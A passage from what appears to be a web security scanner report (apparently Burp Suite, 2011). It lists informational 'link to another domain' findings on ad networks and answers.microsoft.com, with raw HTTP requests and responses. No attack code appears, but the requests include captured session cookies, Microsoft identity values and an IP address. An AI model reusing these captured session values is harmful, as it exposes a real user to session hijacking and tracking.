<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jul 15 10:14:40 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
vaxbr__oadest=http%3a%2f%2fbusiness.comcast.com/94Offer/index.aspx%3FCMP%3DBAC-243767781-5702945-1109496-67396807-%26omndfa%3D1%26utm_source%3D1109496%26utm_medium%3D43116469%26utm_campaign%3D5702945"><img src="http://s0.2mdn.net/2917862/Q311_CBCS-SMB_AQ_BDL_94.85x12_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

20.5. http://ad.doubleclick.net/adj/gamesco.gh/home/w  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/gamesco.gh/home/w

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/gamesco.gh/home/w;env=qa;page=home;pos=wallpaper;game=null;genre=null;login=false;age=null;gender=null;sz=1x1;tile=7;ord=488148701? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 258
Date: Tue, 19 Jul 2011 20:25:41 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b49/0/0/%2a/m;44306;0-0;0;57282045;31-1/1;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="brought to you by our sponsors"></a>
...[SNIP]...

20.6. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:43:03 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:43:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=7212282717808390200&expiration=0" width="0" height="0"/>');

20.7. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:22 GMT
Expires: Tue, 19 Jul 2011 20:44:22 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

20.8. http://answers.microsoft.com/en-us/Forum/ForumThreadList  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.microsoft.com
Path:   /en-us/Forum/ForumThreadList

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en-us/Forum/ForumThreadList?forumId=d6cb25ef-5e2a-e011-8a67-d8d385dcbb12&sort=LastReplyDate&dir=Desc&tab=answered&meta=zune_install&mod=&modAge=&page=1 HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; upthls=fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MyAnswers_=1&fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MarkedHelpful_=1; sdninc=10; fmshb=0,1311089453813

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:32:14 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:31:13 GMT
Content-Length: 74507


<table id="threads">

<tr class="forumList isSticky" id="6211f4a7-5546-40f2-ade6-87a069cb9aa1">

<td class="forumListStatus forumHasAnswer" title="This question is answer
...[SNIP]...
<p>If your Zune player is no longer functioning, you may request service at <a href="http://service.zune.net" target="_blank">
<strong>
...[SNIP]...

20.9. http://answers.microsoft.com/en-us/Site/StartSignIn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.microsoft.com
Path:   /en-us/Site/StartSignIn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en-us/Site/StartSignIn?provider=wlid HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/ie/forum/ie9-windows_7/xss-filter-is-disabled-but-after-sending-several/4896766e-9a67-e011-8dfc-68b599b31bf5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; sdninc=3; fmshb=0,1311089377194

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089370&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:29:29 GMT
Content-Length: 414

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https&#58;&#47;&#47;login.live.com&#47;login.srf&#63;wa&#61;wsignin1.0&#38;rpsnv&#61;11&#38;ct&#61;1311089370&#38;rver&#61;6.1.6206.0&#38;wp&#61;LBI&#38;wreply&#61;https&#58;&#37;2F&#37;2Fanswers.microsoft.com&#37;2Fen-us&#37;2FSite&#37;2FCompleteSignIn&#37;3Fprovider&#37;3Dwlid&#38;id&#61;273572">here</a>
...[SNIP]...

20.10. http://answers.microsoft.com/en-us/Site/StartSignIn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.microsoft.com
Path:   /en-us/Site/StartSignIn

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en-us/Site/StartSignIn?provider=wlid HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install-player/mp3-conversion/efa762b3-d6d3-478f-9a59-1cd7414b0374
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; upthls=fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MyAnswers_=1&fefc3b25-16e6-4403-ac47-6a6b73b7fbbc_LastReplyDate_Desc_MarkedHelpful_=1; frthls=Zune_LastReplyDate_Desc_answered_zune_install__=1; sdninc=14; fmshb=0,1311089475954

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089480&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:31:19 GMT
Content-Length: 414

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https&#58;&#47;&#47;login.live.com&#47;login.srf&#63;wa&#61;wsignin1.0&#38;rpsnv&#61;11&#38;ct&#61;1311089480&#38;rver&#61;6.1.6206.0&#38;wp&#61;LBI&#38;wreply&#61;https&#58;&#37;2F&#37;2Fanswers.microsoft.com&#37;2Fen-us&#37;2FSite&#37;2FCompleteSignIn&#37;3Fprovider&#37;3Dwlid&#38;id&#61;273572">here</a>
...[SNIP]...

20.11. http://answers.microsoft.com/en-us/User/UserThreadList  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.microsoft.com
Path:   /en-us/User/UserThreadList

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /en-us/User/UserThreadList?userId=fefc3b25-16e6-4403-ac47-6a6b73b7fbbc&sort=LastReplyDate&dir=Desc&tab=MyAnswers&forum=&page=1 HTTP/1.1
Host: answers.microsoft.com
Proxy-Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/profile/fefc3b25-16e6-4403-ac47-6a6b73b7fbbc?tab=MyAnswers
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; tzo=300; ST_MSANSWERS_EN-US=2_0_0; fmsmemo=st=|13310|13311; PageStatisticsCookie=456858b0-a8e7-4808-9888-9cca40998b46; sdninc=3; fmshb=0,1311089388223

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:30:45 GMT
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Date: Tue, 19 Jul 2011 15:29:44 GMT
Content-Length: 70436


<table id="threads">

<tr class="forumList" id="1e6e9250-d05b-e011-8dfc-68b599b31bf5">

<td class="forumListStatus forumHasAnswer" title="This question is answered">

...[SNIP]...
<div class="hoverPreview">
Whenever I try to go to my home page, <a href="http://www.msn.com" target="_blank">
www.msn.com</a>, IE9 opens in "about;blank." I have to go to Tools/Internet Options and reset the "Use Current" tab to
<a href="http://www.msn.com" target="_blank">www.msn.com</a>
...[SNIP]...

20.12. http://b3.mookie1.com/2/ticketmaster/172548/11408426983@x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/172548/11408426983@x01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/ticketmaster/172548/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 354
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ticketmaster/172548/L19/48186436/x01/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif/726348573830334f56626741436d4566?x" target="_blank"><IMG SRC="http://imagen04.247realmedia.com/RealMedia/ads/Creatives/USNetwork/Ticketmaster_DumpCampaign/1x1Pixel.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER="0"></A>

20.13. http://b3.mookie1.com/2/ticketmaster/AirCanadaCentre/11408426983@x01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/AirCanadaCentre/11408426983@x01

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /2/ticketmaster/AirCanadaCentre/11408426983@x01? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
